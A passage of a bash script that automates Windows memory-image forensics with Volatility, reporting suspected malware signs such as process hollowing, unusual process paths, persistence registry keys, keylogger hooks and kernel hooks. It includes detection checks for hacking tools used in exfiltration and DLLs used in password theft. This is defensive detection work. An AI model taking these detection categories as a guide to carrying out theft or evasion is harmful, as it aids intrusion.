        tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2,3,4 | grep -E " $ppid$" | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppids/processes-$ppid.temp
        cat $output_dir/tmpfolder/ppids/processes-$ppid.temp | tr '\n' ' ' > $output_dir/tmpfolder/ppids/processes-$ppid-space.temp
        if  ! grep -E -i "explorer.exe|csrss.exe|wininit.exe|winlogon.exe" $output_dir/tmpfolder/ppids/processes-$ppid-space.temp > /dev/null ; then 
          echo -e "\n\nPPID $ppid does not have an associated process." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi 
      fi  
    done < $output_dir/tmpfolder/ppids/ppids.temp

    # verify processes are running in expected sessions:
    for process in " wininit.exe" " services.exe" " lsass.exe" " svchost.exe" " lsm.exe" " winlogon.exe" ; do
      if [[ $process = " csrss.exe" ]] || [[ $process = " wininit.exe" ]] || [[ $process = " services.exe" ]] || [[ $process = " lsass.exe" ]] || [[ $process = " svchost.exe" ]]|| [[ $process = " lsm.exe" ]]; then session="0"; fi
      if [[ $process = " winlogon.exe" ]] ; then session="1" ; fi
      cat $output_dir/pslist/pslist.txt | grep $process | tr -s ' ' | cut -d ' ' -f 7 > $output_dir/tmpfolder/process_sessions.tmp
      while read psession; do
        if [[ $psession != $session ]] ; then
          echo -e "\n\nProcess$process running in unexpected session ($psession instead of $session)." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/pslist/pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/pslist/pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/pslist/pslist.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/process_sessions.tmp
    done

    # check process executable path (dlllist "Command line" against the expected Windows 7 location):
    for process in "smss.exe" "csrss.exe" "wininit.exe" "services.exe" "lsass.exe" "svchost.exe" "lsm.exe" "explorer.exe" "winlogon.exe" "sppsvc.exe"; do
      if [[ $process == "smss.exe" ]]; then processpath="\systemroot\system32\smss.exe" ; fi
      # csrss.exe is launched as %SystemRoot%\system32\csrss.exe, so only the part after the environment variable is captured below
      if [[ $process == "csrss.exe" ]]; then processpath="\system32\csrss.exe" ; fi
      if [[ $process == "wininit.exe" ]]; then processpath="\windows\system32\wininit.exe" ; fi
      if [[ $process == "services.exe" ]]; then processpath="\windows\system32\services.exe" ; fi
      if [[ $process == "lsass.exe" ]]; then processpath="\windows\system32\lsass.exe" ; fi
      if [[ $process == "svchost.exe" ]]; then processpath="\windows\system32\svchost.exe" ; fi
      if [[ $process == "lsm.exe" ]]; then processpath="\windows\system32\lsm.exe" ; fi
      if [[ $process == "explorer.exe" ]]; then processpath="\windows\explorer.exe" ; fi
      if [[ $process == "winlogon.exe" ]]; then processpath="\windows\system32\winlogon.exe" ; fi
      if [[ $process == "sppsvc.exe" ]]; then processpath="\windows\system32\sppsvc.exe" ; fi
      # take the path (from the first backslash up to the first space) of the "Command line" entry that follows each process header, lowercased:
      cat $output_dir/dlllist/dlllist.txt | grep -i -A 1 $process | grep "Command line" | grep -o '\\.*' | cut -d ' ' -f 1 | tr '[:upper:]' '[:lower:]' > $output_dir/tmpfolder/path_list.tmp
      if [[ -s $output_dir/tmpfolder/path_list.tmp ]]; then
        # read -r keeps the backslashes in the path intact
        while read -r path; do
          if [[ "$path" != "$processpath" ]]; then
            echo -e "\n\nProcess running from an unexpected path." >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "Process $process is running from $path instead of $processpath" >> $output_dir/tmpfolder/malware-checks.tmp
          fi
        done < $output_dir/tmpfolder/path_list.tmp
      fi
    done

    # verify if any processes have suspicious l33t names:
    cat $output_dir/psscan/psscan.txt | grep -E -i $l33t_process_name > $output_dir/tmpfolder/suspicious_process.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_process.tmp ]]; then
      echo -e "\n\nProcess with suspicious name." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_process.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # verify if any hacker tools were used in process list:
    cat $output_dir/psscan/psscan.txt | grep -E -i $hacker_process_regex > $output_dir/tmpfolder/suspicious_tools.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_tools.tmp ]]; then
      echo -e "\n\nProcesses that may have been used for lateral movement, exfiltration etc." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_tools.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # detect process hollowing:
    mkdir $output_dir/tmpfolder/hollowing
    vol.py --profile=$profile -f $memory_image procdump -u -D $output_dir/tmpfolder/hollowing/ &> /dev/null
    # process names without extension, skipping the three psscan header lines before sorting:
    tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2 | cut -d '.' -f 1 | sort | uniq > $output_dir/tmpfolder/procnames.tmp
    while read process ; do
      cat $output_dir/psscan/psscan.txt | grep -i $process | tr -s ' ' | cut -d ' ' -f 3 > $output_dir/tmpfolder/$process-pids.tmp
      touch $output_dir/tmpfolder/$process-size.tmp
      while read pid ; do
        ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1 >> $output_dir/tmpfolder/$process-size.tmp
      done < $output_dir/tmpfolder/$process-pids.tmp
      cat $output_dir/tmpfolder/$process-size.tmp | uniq > $output_dir/tmpfolder/$process-size-uniq.tmp
      lines=`wc -l < $output_dir/tmpfolder/$process-size-uniq.tmp`
      if [[ $lines != 1 ]] && [[ $lines != 0 ]]  ; then 
        echo -e "\n\nPotential process hollowing detected in $process (based on size)." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "Process    PID  Size" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "-----------------------------------" >> $output_dir/tmpfolder/malware-checks.tmp
        while read pid ; do
          echo -e "$process    $pid  `ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1`" >> $output_dir/tmpfolder/malware-checks.tmp
        done < $output_dir/tmpfolder/$process-pids.tmp   
      fi
    done < $output_dir/tmpfolder/procnames.tmp

    # detect processes with exit time but active threads:
    cat $output_dir/psxview/psxview.txt | tr -s ' ' | cut -d ' ' -f 1,2,6,13 | grep "UTC" | grep "True" | cut -d ' ' -f 1 > $output_dir/tmpfolder/exit_with_threads.tmp
    if [[ -s $output_dir/tmpfolder/exit_with_threads.tmp ]]; then
      echo -e "\n\nProcess(es) with exit time and active threads running." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psxview/psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psxview/psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      while read procname ; do 
        cat $output_dir/psxview/psxview.txt | grep $procname >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/exit_with_threads.tmp
    fi

    # check if any process has domain or enterprise admin privileges:
    cat $output_dir/getsids/getsids.txt | grep -E '(Domain Admin|Enterprise Admin|Schema Admin)' > $output_dir/tmpfolder/suspicious_privilege.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_privilege.tmp ]]; then
      echo -e "\n\nProcess(es) with domain or enterprise admin privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_privilege.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has debug privileges:
    cat $output_dir/privs/privs.txt | grep -i "debug" > $output_dir/tmpfolder/debug_privs.tmp
    if [[ -s $output_dir/tmpfolder/debug_privs.tmp ]]; then
      echo -e "\n\nProcess(es) with debug privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/privs/privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/privs/privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/debug_privs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a raw socket handle:
    cat $output_dir/handles/handles.txt | grep -F "\Device\RawIp" > $output_dir/tmpfolder/raw_socket.tmp
    if [[ -s $output_dir/tmpfolder/raw_socket.tmp ]]; then
      echo -e "\n\nRaw socket handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/raw_socket.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a handle to a remote mapped share:
    cat $output_dir/handles/handles.txt | grep -E "\\\\Device\\\\(LanmanRedirector|Mup)" > $output_dir/tmpfolder/remote_shares.tmp
    if [[ -s $output_dir/tmpfolder/remote_shares.tmp ]]; then
      echo -e "\n\nRemote share handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/remote_shares.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - DLLs ################################

    # find new dlls (atoms):
    cat $output_dir/atoms/atoms.txt | grep -i -E "\.dll$" > $output_dir/tmpfolder/atoms.tmp
    if [[ -s $output_dir/tmpfolder/atoms.tmp ]] ; then
      echo -e "\n\nDLLs found in atoms output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atoms/atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atoms/atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atoms.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atomscan):
    cat $output_dir/atomscan/atomscan.txt | grep -i -E "\.dll$" > $output_dir/tmpfolder/atomscan.tmp
    if [[ -s $output_dir/tmpfolder/atomscan.tmp ]] ; then
      echo -e "\n\nDLLs found in atomscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atomscan/atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atomscan/atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atomscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight hidden DLLs (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep "False" | grep -E -v -i "system32|explorer.exe|iexplore.exe|\.fon$" | sort | uniq > $output_dir/tmpfolder/ldrmodules.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodules.tmp ]] ; then
      echo -e "\n\nSuspicious ldrmodules entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodules.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    # find highly suspicious DLLs used for password stealing (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i $hacker_dll_regex | sort | uniq > $output_dir/tmpfolder/ldrmodule_hacker.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hacker.tmp ]] ; then
      echo -e "\n\nDLLs that may have been used for password theft." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hacker.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find DLLs with no path / no name (indicates process hollowing) (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i "no name" | sort | uniq > $output_dir/tmpfolder/ldrmodule_hollow.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hollow.tmp ]] ; then
      echo -e "\n\nDLLs with no path/name (indicates process hollowing)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hollow.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - FILES ################################

    # find DLLs/EXES loaded from temp folders (dlllist):
    cat $output_dir/dlllist/dlllist.txt | grep -E -i "TMP|TEMP|AppData" | sort | uniq > $output_dir/tmpfolder/dlllist_temp.tmp
    if [[ -s $output_dir/tmpfolder/dlllist_temp.tmp ]] ; then
      echo -e "\n\nDLLs/EXEs loaded from temp folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlllist_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hidden DLLs/EXEs (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i "False  False  False" | sort | uniq | grep -E -i "\.dll$|\.exe$" > $output_dir/tmpfolder/ldrmodule_hidden.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hidden.tmp ]] ; then
      echo -e "\n\nDLLs/EXEs hidden from ldrmodules." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hidden.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight prefetch files:
    cat $output_dir/mftparser/mftparser.txt | grep '\.pf$' | awk '{print $NF}' | sort | uniq > $output_dir/tmpfolder/prefetch.tmp
    if [[ -s $output_dir/tmpfolder/prefetch.tmp ]]; then
      echo -e "\n\nPrefetch artifacts." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/prefetch.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight binaries loaded from TEMP folders:
    cat $output_dir/envars/envars.txt | grep -i "TEMP" > $output_dir/tmpfolder/temp_envars.tmp
    if [[ -s $output_dir/tmpfolder/temp_envars.tmp ]]; then
      echo -e "\n\nPossible binaries loaded from TEMP folders (envars)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/envars/envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/envars/envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/temp_envars.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find interesting executables (dlllist):
    cat $output_dir/dlllist/dlllist.txt | grep "Command line" | grep -E -v -i "system32|explorer.exe|iexplore.exe" | sed -e 's/Command line : //' | sort | uniq > $output_dir/tmpfolder/execs.tmp
    if [[ -s $output_dir/tmpfolder/execs.tmp ]] ; then
      echo -e "\n\nInteresting executables (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/execs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight alternate data stream files:
    cat $output_dir/mftparser/mftparser.txt | grep "DATA ADS" > $output_dir/tmpfolder/ads.tmp
    if [[ -s $output_dir/tmpfolder/ads.tmp ]]; then
      echo -e "\n\nAlternate Data Stream (ADS) files." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - MISC ################################

    # find interesting entries in the hosts file (dumped from the memory image via filescan/dumpfiles):
    mkdir $output_dir/tmpfolder/hosts
    qaddress=$(cat $output_dir/filescan/filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddress" ]] ; then
      vol.py --profile=$profile -f $memory_image dumpfiles -Q $qaddress -D $output_dir/tmpfolder/hosts --name &> /dev/null
      # only stderr is discarded here; the printable strings must still reach hosts.tmp
      strings $output_dir/tmpfolder/hosts/* > $output_dir/tmpfolder/hosts.tmp 2> /dev/null
    fi
    if [[ -s $output_dir/tmpfolder/hosts.tmp ]] ; then
      cat $output_dir/tmpfolder/hosts.tmp | grep -v "^#" > $output_dir/tmpfolder/interesting-hosts.tmp
      if [[ -s $output_dir/tmpfolder/interesting-hosts.tmp ]] ; then
        echo -e "\n\nEntries in hosts file." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/interesting-hosts.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    ################################ MALWARE CHECKS - PERSISTENCE ################################

    echo -e "Searching for persistence artifacts..."

    # highlight temp folders appearing in services:
    cat $output_dir/svcscan/svcscan.txt | grep -i -E "TMP|TEMP|AppData" > $output_dir/tmpfolder/svcscan_temp.tmp
    if [[ -s $output_dir/tmpfolder/svcscan_temp.tmp ]]; then
      echo -e "\n\nTemp folders appearing in services." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/svcscan_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # dump registry keys commonly used for persistence (the key is quoted because some paths contain spaces):
    mkdir $output_dir/printkey
    plugin="printkey"
    for key in "Microsoft\Windows\CurrentVersion\RunOnce" "Microsoft\Windows\CurrentVersion\Run" "Software\Microsoft\Windows\CurrentVersion\RunOnce" "Software\Microsoft\Windows\CurrentVersion\Run" "Microsoft\Windows\CurrentVersion\RunServices" "Microsoft\Windows\CurrentVersion\RunServicesOnce" "Software\Microsoft\Windows NT\CurrentVersion\Winlogon" "Microsoft\Security Center\Svc" ; do
      vol.py --profile=$profile -f $memory_image $plugin -K "$key" &>> $output_dir/tmpfolder/printkey.tmp
    done
    # strip NUL bytes from the combined output once all keys have been dumped:
    tr < $output_dir/tmpfolder/printkey.tmp -d '\000' > $output_dir/printkey/printkey.txt

    # highlight temp folders appearing in dumped registry keys:
    cat $output_dir/printkey/printkey.txt | grep -i -E "TMP|TEMP|AppData" > $output_dir/tmpfolder/printkey_temp.tmp
    if [[ -s $output_dir/tmpfolder/printkey_temp.tmp ]]; then
      echo -e "\n\nTemp folders appearing in dumped registry keys." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/printkey_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - KERNEL ################################

    # find keylogger traces in messagehooks:
    cat $output_dir/messagehooks/messagehooks.txt | grep -i "KEYBOARD" > $output_dir/tmpfolder/keyboard_messagehooks.tmp
    if [[ -s $output_dir/tmpfolder/keyboard_messagehooks.tmp ]]; then
      echo -e "\n\nKeylogger traces (messagehooks)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/messagehooks/messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/messagehooks/messagehooks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/keyboard_messagehooks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unusual timers:
    tail -n +4 $output_dir/timers/timers.txt | grep -E -v -i "ataport.SYS|ntoskrnl.exe|NETIO.SYS|storport.sys|afd.sys|cng.sys|dfsc.sys|discache.sys|HTTP.sys|luafv.sys|ndis.sys|Ntfs.sys|rdbss.sys|rdyboost.sys|spsys.sys|srvnet.sys|srv.sys|tcpip.sys|usbccgp.sys" | sort | uniq >> $output_dir/tmpfolder/timers.tmp
    if [[ -s $output_dir/tmpfolder/timers.tmp ]] ; then
      echo -e "\n\ntimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set kernel timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find unusual gditimers:
    tail -n +4 $output_dir/gditimers/gditimers.txt | grep -E -v -i "dllhost.exe|explorer.exe|csrss.exe" | sort | uniq >> $output_dir/tmpfolder/gditimers.tmp
    if [[ -s $output_dir/tmpfolder/gditimers.tmp ]] ; then
      echo -e "\n\ngditimers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/gditimers/gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/gditimers/gditimers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/gditimers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      if [[ $@ =~ "--add-hints" ]] ; then
        echo -e "\nHint: Malware can set timers to run functions at specified intervals." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    fi

    # find malicious kernel timers:
    cat $output_dir/timers/timers.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_timers.tmp
    if [[ -s $output_dir/tmpfolder/unknown_timers.tmp ]]; then
      echo -e "\n\nMalicious kernel timers." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/timers/timers.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_timers.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find malicious kernel callbacks:
    cat $output_dir/callbacks/callbacks.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_callbacks.tmp
    if [[ -s $output_dir/tmpfolder/unknown_callbacks.tmp ]]; then
      echo -e "\n\nMalicious kernel callbacks." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/callbacks/callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/callbacks/callbacks.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_callbacks.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown drivermodule entries:
    cat $output_dir/drivermodule/drivermodule.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_drivermodule.tmp
    if [[ -s $output_dir/tmpfolder/unknown_drivermodule.tmp ]]; then
      echo -e "\n\nNew suspicious drivermodule entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/drivermodule/drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/drivermodule/drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_drivermodule.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown driverirp entries:
    cat $output_dir/driverirp/driverirp.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_driverirp.tmp
    if [[ -s $output_dir/tmpfolder/unknown_driverirp.tmp ]]; then
      echo -e "\n\nNew suspicious driverirp entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_driverirp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hooked ssdt functions:
    cat $output_dir/ssdt/ssdt.txt | grep -i -E -v '(ntos|win32k)' | grep -i "Entry" > $output_dir/tmpfolder/hooked_ssdt.tmp
    if [[ -s $output_dir/tmpfolder/hooked_ssdt.tmp ]]; then
      echo -e "\n\nHooked ssdt functions." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/hooked_ssdt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find suspicious idt entries:
    cat $output_dir/idt/idt.txt | grep -i "rsrc" > $output_dir/tmpfolder/manipulated_idt.tmp
    if [[ -s $output_dir/tmpfolder/manipulated_idt.tmp ]]; then
      echo -e "\n\nSuspicious idt entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/idt/idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/idt/idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/manipulated_idt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # display orphan threads:
    tail -n +4 $output_dir/orphanthreads/orphanthreads.txt > $output_dir/tmpfolder/orphanthreads.tmp
    if [[ -s $output_dir/tmpfolder/orphanthreads.tmp ]]; then
      echo -e "\n\nOrphan threads." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/orphanthreads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - STRINGS ################################

    echo -e "Hunting for badness in memory strings..."

    # dump unusual processes to disk
    tail -n +4 $output_dir/psscan/psscan.txt | grep -v -i -E $usual_processes | tr -s ' ' | cut -d ' ' -f 1 > $output_dir/tmpfolder/offsets_to_dmp.tmp
    mkdir $output_dir/procdump
    while read offset ; do
      vol.py --profile=$profile -f $memory_image -o $offset procdump -D $output_dir/procdump &> /dev/null &
    done < $output_dir/tmpfolder/offsets_to_dmp.tmp
    wait

    # run volatility strings plugin against [some] processes
    mkdir $output_dir/strings
    strings -a -td $output_dir/malfind/dump-dir/* > $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    strings -a -td $output_dir/procdump/* >> $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
